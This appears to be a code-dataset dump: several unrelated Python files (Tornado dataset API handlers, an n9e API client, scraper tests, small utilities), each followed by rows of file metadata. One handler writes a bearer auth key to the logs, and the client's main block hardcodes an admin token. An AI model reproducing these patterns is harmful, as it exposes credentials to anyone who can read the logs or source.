data['start_date'] = nowstr()
data['username'] = self.auth_data['username']
if 'priority' not in data:
data['priority'] = 0.5
if 'debug' not in data:
data['debug'] = False
if 'jobs_immutable' not in data:
data['jobs_immutable'] = False
# insert
ret = await self.db.datasets.insert_one(data)
# set auth rules
url = '/auths/'+data['dataset_id']
http_client = RestClient(self.auth_url, token=self.module_auth_key)
auth_data = {
'read_groups':['admin',data['group'],'users'],
'write_groups':['admin',data['group']],
}
logger.info('Authorization header: %s', 'bearer '+self.module_auth_key)
await http_client.request('PUT', url, auth_data)
# return success
self.set_status(201)
self.set_header('Location', '/datasets/'+data['dataset_id'])
self.write({'result': '/datasets/'+data['dataset_id']})
self.finish()
class DatasetHandler(BaseHandler):
"""
Handle dataset requests.
"""
@authorization(roles=['admin','client','system','pilot'], attrs=['dataset_id:read'])
async def get(self, dataset_id):
"""
Get a dataset.
Args:
dataset_id (str): the dataset
Returns:
dict: dataset metadata
"""
ret = await self.db.datasets.find_one({'dataset_id':dataset_id},
projection={'_id':False})
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write(ret)
self.finish()
class DatasetDescriptionHandler(BaseHandler):
"""
Handle dataset description updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset description.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'description' not in data:
raise tornado.web.HTTPError(400, reason='missing description')
elif not isinstance(data['description'],str):
raise tornado.web.HTTPError(400, reason='bad description')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'description': data['description']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetStatusHandler(BaseHandler):
"""
Handle dataset status updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset status.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'status' not in data:
raise tornado.web.HTTPError(400, reason='missing status')
elif data['status'] not in dataset_statuses:
raise tornado.web.HTTPError(400, reason='bad status')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'status': data['status']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetPriorityHandler(BaseHandler):
"""
Handle dataset priority updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset priority.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'priority' not in data:
raise tornado.web.HTTPError(400, reason='missing priority')
elif not isinstance(data['priority'], (int, float)):
raise tornado.web.HTTPError(400, reason='priority is not a number')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'priority': data['priority']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetJobsSubmittedHandler(BaseHandler):
"""
Handle dataset jobs_submitted updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset's jobs_submitted.
Only allows increases, if the jobs_immutable flag is not set.
Args:
dataset_id (str): the dataset
Json body:
jobs_submitted (int): the number of jobs submitted
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'jobs_submitted' not in data:
raise tornado.web.HTTPError(400, reason='missing jobs_submitted')
try:
jobs_submitted = int(data['jobs_submitted'])
except Exception:
raise tornado.web.HTTPError(400, reason='jobs_submitted is not an int')
ret = await self.db.datasets.find_one({'dataset_id':dataset_id})
if not ret:
raise tornado.web.HTTPError(404, reason='Dataset not found')
if ret['jobs_immutable']:
raise tornado.web.HTTPError(400, reason='jobs_submitted is immutable')
if ret['jobs_submitted'] > jobs_submitted:
raise tornado.web.HTTPError(400, reason='jobs_submitted must be larger than before')
if 'tasks_per_job' not in ret or ret['tasks_per_job'] <= 0:
raise tornado.web.HTTPError(400, reason='tasks_per_job not valid')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{
'jobs_submitted': jobs_submitted,
'tasks_submitted': int(jobs_submitted*ret['tasks_per_job']),
}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetSummariesStatusHandler(BaseHandler):
"""
Handle dataset summary grouping by status.
"""
@authorization(roles=['admin','system','client','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get the dataset summary for all datasets, group by status.
Returns:
dict: {<status>: [<dataset_id>,]}
"""
cursor = self.db.datasets.find(
projection={'_id':False,'status':True,'dataset_id':True})
ret = defaultdict(list)
async for row in cursor:
ret[row['status']].append(row['dataset_id'])
ret2 = {}
for k in sorted(ret, key=dataset_status_sort):
ret2[k] = ret[k]
self.write(ret2)
self.finish()
| 34.978723
| 122
| 0.586603
| 1,512
| 13,152
| 4.973545
| 0.168651
| 0.05266
| 0.035904
| 0.057447
| 0.391489
| 0.353457
| 0.330452
| 0.307048
| 0.280452
| 0.253059
| 0
| 0.008925
| 0.284367
| 13,152
| 375
| 123
| 35.072
| 0.790055
| 0.061359
| 0
| 0.27193
| 0
| 0
| 0.18022
| 0.023221
| 0
| 0
| 0
| 0.005333
| 0
| 1
| 0.008772
| false
| 0
| 0.052632
| 0
| 0.100877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e79f990859c3061f129402b3a92ec843ee5ea60
| 2,938
|
py
|
Python
|
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | null | null | null |
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | 6
|
2021-03-19T10:20:05.000Z
|
2021-09-22T19:30:21.000Z
|
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# author: itimor
import requests
import json
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
class FalconClient(object):
def __init__(self, endpoint=None, user=None, token=None, keys=[], session=None, ssl_verify=True):
self._endpoint = endpoint
self._job_prex = 'job/'
self._url_suffix = 'api/json'
self._keys = keys
self._session = session
self.ssl_verify = ssl_verify
if not session:
params = {
"name": user,
"password": token
}
self._session = requests.Session()
ret = self.do_request('get', '/', params=params)
print(ret)
api_token = {
"name": user,
"sig": ret.get("sig")
}
self._session.auth = (user, token)
self._session.headers.update({
'Content-Type': 'application/json; charset=utf-8',
'Accept': 'application/json',
'Apitoken': json.dumps(api_token)
})
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
return self.__class__(
endpoint=self._endpoint,
keys=self._keys + [key],
session=self._session,
ssl_verify=self.ssl_verify)
def __getitem__(self, key):
"""Look up an option value and perform string substitution."""
return self.__getattr__(key)
def __call__(self, **kwargs):
method = self._keys[-1]
url = "/".join(self._keys[0:-1])
url = url.replace("_", "-")
return self.do_request(method, url, **kwargs)
def do_request(self, method, url, params=None, data=None):
url = self._endpoint + url + self._url_suffix
if data:
print(data)
if params is None:
params = {}
if method == 'get' or method == 'list':
response = self._session.get(url, params=params, verify=self.ssl_verify)
if method == 'post' or method == 'create':
response = self._session.post(url, params=params, json=data, verify=self.ssl_verify)
if method == 'put' or method == 'update':
response = self._session.put(url, json=data, verify=self.ssl_verify)
if method == 'delete':
response = self._session.delete(url, params=params, json=data, verify=self.ssl_verify)
try:
body = json.loads(response.text)
except ValueError:
body = "Get unknow error is [%s]" % response.reason
return body
if __name__ == '__main__':
cli = FalconClient(endpoint="http://n9e.xxoo.com", user='admin', token='11871bd159bd19da9ab624d161c569e3c8')
params = {"idents": ["192.168.0.112"]}
r = cli.node['2'].endpoint_unbind.post(data=params)
print(r)
| 31.255319
| 112
| 0.566372
| 331
| 2,938
| 4.791541
| 0.335347
| 0.051072
| 0.04918
| 0.059899
| 0.0971
| 0.0971
| 0.080076
| 0.080076
| 0.052963
| 0
| 0
| 0.019118
| 0.30565
| 2,938
| 93
| 113
| 31.591398
| 0.758333
| 0.031995
| 0
| 0.056338
| 0
| 0
| 0.090236
| 0.011984
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070423
| false
| 0.014085
| 0.070423
| 0
| 0.225352
| 0.042254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e7ab87b888bbbe2383cfa6903a948e5d52465e7
| 9,035
|
py
|
Python
|
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for scrapername.
'''
import difflib
import filecmp
from datetime import datetime
from os.path import join
from tempfile import gettempdir
import pytest
from hdx.hdx_configuration import Configuration
import hdx.utilities.downloader
from hdx.utilities.compare import assert_files_same
from hdx.utilities.loader import load_json
from src.acled import update_lc_acled, update_ssd_acled
from mapexplorer import get_valid_names
from src.cbpf import update_cbpf
from src.fts import update_fts
#from src.rowca import update_rowca
class TestScraperName:
@pytest.fixture(scope='class')
def configuration(self):
Configuration._create(user_agent='test', hdx_read_only=True,
project_config_yaml=join('tests', 'config', 'project_configuration.yml'))
@pytest.fixture(scope='class')
def folder(self, configuration):
return gettempdir()
@pytest.fixture(scope='class')
def downloader(self):
return hdx.utilities.downloader.Download()
@pytest.fixture(scope='class')
def today(self):
return datetime.strptime('2018-01-16', '%Y-%m-%d')
@pytest.fixture(scope='class')
def lc_country_list(self, configuration):
return ['Nigeria']
@pytest.fixture(scope='class')
def ssd_country_list(self, configuration):
return ['South Sudan']
@pytest.fixture(scope='class')
def valid_lc_names(self, downloader):
lc_names_url = Configuration.read()['lc_names_url']
return get_valid_names(downloader, lc_names_url, headers=['ISO', 'Name'])
@pytest.fixture(scope='class')
def replace_lc_values(self, downloader):
lc_mappings_url = Configuration.read()['lc_mappings_url']
return downloader.download_tabular_key_value(lc_mappings_url)
@pytest.fixture(scope='class')
def valid_ssd_adm1_names(self, downloader):
ssd_adm1_names_url = Configuration.read()['ssd_adm1_names_url']
return get_valid_names(downloader, ssd_adm1_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def valid_ssd_adm2_names(self, downloader):
ssd_adm2_names_url = Configuration.read()['ssd_adm2_names_url']
return get_valid_names(downloader, ssd_adm2_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def replace_ssd_values(self, downloader):
ssd_mappings_url = Configuration.read()['ssd_mappings_url']
return downloader.download_tabular_key_value(ssd_mappings_url)
@pytest.fixture(scope='function')
def downloaderfts(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://lala/plan/country/NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_plan_NGA.json'))
response.json = fn
elif url == 'http://lala/fts/flow?groupby=plan&countryISO3=NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_flow_NGA.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloaderrowca(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://haha/country=3,4,8,9&subcat=4&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_population.json'))
response.json = fn
elif url == 'http://haha/country=3,4,8,9&subcat=9,10&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_movement.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloadercbpf(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://mama/ProjectSummary?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_ProjectSummary_SSD.json'))
response.json = fn
elif url == 'http://mama/Location?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_Location_SSD.json'))
response.json = fn
return response
return Download()
def test_lc_acled(self, folder, today, lc_country_list, valid_lc_names, replace_lc_values):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'Lake_Chad_Basin_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_lc_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDNigeria.csv?', lc_country_list, valid_lc_names, replace_lc_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_ssd_acled(self, folder, today, ssd_country_list, valid_ssd_adm2_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'South_Sudan_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_ssd_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDSouthSudan.csv?', ssd_country_list, valid_ssd_adm2_names, replace_ssd_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_fts(self, folder, downloaderfts, lc_country_list):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Appeal_Status.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['fts'] = {'path': actual}
update_fts('http://lala/', downloaderfts, lc_country_list, resource_updates)
assert_files_same(expected, actual)
def test_cbpf(self, folder, today, downloadercbpf, valid_ssd_adm1_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Country_Based_Pool_Funds.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['cbpf'] = {'path': actual}
update_cbpf('http://mama/', downloadercbpf, 'SSD19', today, valid_ssd_adm1_names, replace_ssd_values, resource_updates)
assert_files_same(expected, actual)
# def test_rowca(self, folder, downloaderrowca, valid_lc_names, replace_lc_values):
# resource_updates = dict()
# filename = 'Lake_Chad_Basin_Estimated_Population.csv'
# expected_population = join('tests', 'fixtures', filename)
# actual_population = join(folder, filename)
# resource_updates['rowca_population'] = {'path': actual_population}
# filename = 'Lake_Chad_Basin_Displaced.csv'
# expected_displaced = join('tests', 'fixtures', filename)
# actual_displaced = join(folder, filename)
# resource_updates['rowca_displaced'] = {'path': actual_displaced}
# update_rowca('http://haha/', downloaderrowca, valid_lc_names, replace_lc_values, resource_updates)
# assert filecmp.cmp(expected_population, actual_population, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_population, actual_population)
# assert filecmp.cmp(expected_displaced, actual_displaced, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_displaced, actual_displaced)
| 44.727723
| 220
| 0.657554
| 1,017
| 9,035
| 5.576205
| 0.165192
| 0.047611
| 0.044437
| 0.044613
| 0.691589
| 0.611003
| 0.580674
| 0.537824
| 0.497972
| 0.44419
| 0
| 0.00607
| 0.2342
| 9,035
| 201
| 221
| 44.950249
| 0.813557
| 0.123962
| 0
| 0.525641
| 0
| 0.025641
| 0.182106
| 0.045748
| 0
| 0
| 0
| 0
| 0.044872
| 1
| 0.192308
| false
| 0.019231
| 0.089744
| 0.070513
| 0.467949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e81b7168137c8ead27ea61e73b96364b565fc1e
| 708
|
py
|
Python
|
2016/day_06.py
|
nabiirah/advent-of-code
|
9c7e7cae437c024aa05d9cb7f9211fd47f5226a2
|
[
"MIT"
] | 24
|
2020-12-08T20:07:52.000Z
|
2022-01-18T20:08:06.000Z
|
2016/day_06.py
|
nestorhf/advent-of-code
|
1bb827e9ea85e03e0720e339d10b3ed8c44d8f27
|
[
"MIT"
] | null | null | null |
2016/day_06.py
|
nestorhf/advent-of-code
|
1bb827e9ea85e03e0720e339d10b3ed8c44d8f27
|
[
"MIT"
] | 10
|
2020-12-04T10:04:15.000Z
|
2022-02-21T22:22:26.000Z
|
""" Advent of Code Day 6 - Signals and Noise"""
with open('inputs/day_06.txt', 'r') as f:
rows = [row.strip() for row in f.readlines()]
flipped = zip(*rows)
message = ''
mod_message = ''
for chars in flipped:
most_freq = ''
least_freq = ''
highest = 0
lowest = 100
for char in chars:
if chars.count(char) > highest:
highest = chars.count(char)
most_freq = char
if chars.count(char) < lowest: # Part Two
lowest = chars.count(char)
least_freq = char
message += most_freq
mod_message += least_freq
# Answer One
print("Error Corrected Message:", message)
# Answer Two
print("Modified Message:", mod_message)
| 22.83871
| 51
| 0.601695
| 94
| 708
| 4.425532
| 0.478723
| 0.096154
| 0.134615
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.278249
| 708
| 30
| 52
| 23.6
| 0.800391
| 0.101695
| 0
| 0
| 0
| 0
| 0.094099
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e83689fcdf6c1f0b2f2c351aa1c6fe2dad28771
| 1,846
|
py
|
Python
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
import hashlib
import json
import os
import pathlib
import shlex
import nbformat
from invoke import task
files_to_format = ["chmp/src", "tasks.py", "chmp/setup.py"]
inventories = [
"http://daft-pgm.org",
"https://matplotlib.org",
"http://www.numpy.org",
"https://pandas.pydata.org",
"https://docs.python.org/3",
"https://pytorch.org/docs/stable",
]
directories_to_test = ["chmp", "20170813-KeywordDetection/chmp-app-kwdetect"]
@task
def precommit(c):
format(c)
docs(c)
test(c)
@task
def test(c):
run(c, "pytest", *directories_to_test)
@task
def docs(c):
run(
c,
*["python", "-m", "chmp.tools", "mddocs"],
*(part for inventory in inventories for part in ["--inventory", inventory]),
*["chmp/docs/src", "chmp/docs"],
)
self_path = pathlib.Path(__file__).parent.resolve()
for p in self_path.glob("*/Post.ipynb"):
run(
c,
*["python", "-m", "chmp.tools", "blog"],
*[str(p), str(p.with_suffix(".md"))],
)
@task
def format(c):
run(c, "black", *files_to_format)
@task
def release(c, yes=False):
import packaging.version
with c.cd("chmp"):
run(c, "python", "setup.py", "bdist_wheel")
latest_package = max(
(
package
for package in os.listdir("chmp/dist")
if not package.startswith(".") and package.endswith(".whl")
),
key=packaging.version.parse,
)
if not yes:
answer = input(f"upload {latest_package} [yN] ")
if answer != "y":
print("stop")
return
with c.cd("chmp/dist"):
run(c, "twine", "upload", latest_package)
def run(c, *args, **kwargs):
args = [shlex.quote(arg) for arg in args]
args = " ".join(args)
return c.run(args, **kwargs)
| 20.511111
| 84
| 0.566089
| 237
| 1,846
| 4.329114
| 0.434599
| 0.02729
| 0.01462
| 0.021443
| 0.038986
| 0.038986
| 0
| 0
| 0
| 0
| 0
| 0.006574
| 0.258397
| 1,846
| 89
| 85
| 20.741573
| 0.742878
| 0
| 0
| 0.134328
| 0
| 0
| 0.228061
| 0.023294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089552
| false
| 0
| 0.119403
| 0
| 0.238806
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e83cc92299ecc7a687b5a70cfeda857351d4ef2
| 1,016
|
py
|
Python
|
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import requests
import json
import random
import hashlib
KEY = ''
APPID = ''
API = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
class translation():
def __init__(self,src, fromlang, tolang):
self.src = src
self.fromlang = fromlang
self.tolang = tolang
def trans(self):
salt = random.randint(32768,65535)
sign = APPID+self.src+str(salt)+KEY
m1 = hashlib.md5()
m1.update(sign)
sign = m1.hexdigest()
paras = {
'q':self.src,
'from':self.fromlang,
'to':self.tolang,
'appid':APPID,
'salt':salt,
'sign':sign
}
result = requests.get(API,params=paras,timeout=50)
tdata = json.loads(result.text)
res_msg = ''
src = tdata['trans_result'][0]['src']
dst = tdata['trans_result'][0]['dst']
res_msg += '源语言: %s\n翻译结果: %s' % (src.encode('utf8'), dst.encode('utf8'))
return res_msg
| 25.4
| 81
| 0.541339
| 122
| 1,016
| 4.434426
| 0.47541
| 0.051756
| 0.05915
| 0.062847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029619
| 0.302165
| 1,016
| 39
| 82
| 26.051282
| 0.733427
| 0.019685
| 0
| 0
| 0
| 0
| 0.125755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.121212
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e864e061007124f810efb595fdd8cc9331ec714
| 2,040
|
py
|
Python
|
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Salvador E. Tropea
# Copyright (c) 2021 Instituto Nacional de Tecnología Industrial
# License: Apache 2.0
# Project: KiCost
# Adapted from: https://github.com/alexprengere/currencyconverter
"""
CurrencyConverter:
This is reduced version of the 'Currency Converter' by Alex Prengère.
Original project: https://github.com/alexprengere/currencyconverter
This version only supports conversions for the last exchange rates, not
historic ones.
On the other hand this version always tries to get the last rates.
"""
try:
from .default_rates import default_rates, default_date
except ImportError:
# Only useful to boostrap
default_rates = {}
default_date = ''
from .download_rates import download_rates
# Author information.
__author__ = 'Salvador Eduardo Tropea'
__webpage__ = 'https://github.com/set-soft/'
__company__ = 'INTI-CMNB - Argentina'
class CurrencyConverter(object):
def __init__(self):
self.initialized = False
def _do_init(self):
if self.initialized:
return
self.date, self.rates = download_rates()
if not self.date:
self.date = default_date
self.rates = default_rates
self.initialized = True
def convert(self, amount, currency, new_currency='EUR'):
"""Convert amount from a currency to another one.
:param float amount: The amount of `currency` to convert.
:param str currency: The currency to convert from.
:param str new_currency: The currency to convert to.
:return: The value of `amount` in `new_currency`.
:rtype: float
>>> c = CurrencyConverter()
>>> c.convert(100, 'EUR', 'USD')
"""
self._do_init()
for c in currency, new_currency:
if c not in self.rates:
raise ValueError('{0} is not a supported currency'.format(c))
r0 = self.rates[currency]
r1 = self.rates[new_currency]
return float(amount) / r0 * r1
| 30.447761
| 77
| 0.666667
| 255
| 2,040
| 5.196078
| 0.431373
| 0.033962
| 0.031698
| 0.039245
| 0.10717
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012862
| 0.237745
| 2,040
| 66
| 78
| 30.909091
| 0.839228
| 0.457843
| 0
| 0
| 0
| 0
| 0.103922
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.107143
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e893aecc42c83f372f87792977e579561f4f1e5
| 385
|
py
|
Python
|
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | 22
|
2021-08-10T05:11:47.000Z
|
2022-02-27T14:35:30.000Z
|
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | null | null | null |
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | 8
|
2021-10-04T13:10:32.000Z
|
2021-11-17T12:32:57.000Z
|
import streamlit as st
import leafmap
def app():
st.title("Add vector datasets")
url = "https://raw.githubusercontent.com/giswqs/data/main/world/world_cities.csv"
in_csv = st.text_input("Enter a URL to a vector file", url)
m = leafmap.Map()
if in_csv:
m.add_xy_data(in_csv, x="longitude", y="latitude", layer_name="World Cities")
m.to_streamlit()
| 22.647059
| 85
| 0.675325
| 61
| 385
| 4.114754
| 0.639344
| 0.059761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18961
| 385
| 16
| 86
| 24.0625
| 0.804487
| 0
| 0
| 0
| 0
| 0
| 0.387013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e90e63aeba9851ed0445a458eb6eb560cabb51f
| 5,684
|
py
|
Python
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 4,474
|
2015-01-01T18:34:36.000Z
|
2022-03-29T06:02:38.000Z
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 835
|
2015-01-06T21:29:48.000Z
|
2022-03-31T04:35:10.000Z
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 980
|
2015-01-02T21:41:28.000Z
|
2022-03-31T08:30:52.000Z
|
import os
import sys
import tempfile
import unittest
import subprocess
from unittest.mock import Mock, patch
import mock
from prometheus_client import Histogram
from flower.command import apply_options, warn_about_celery_args_used_in_flower_command, apply_env_options
from tornado.options import options
from tests.unit import AsyncHTTPTestCase
class TestFlowerCommand(AsyncHTTPTestCase):
def test_task_runtime_metric_buckets_read_from_cmd_line(self):
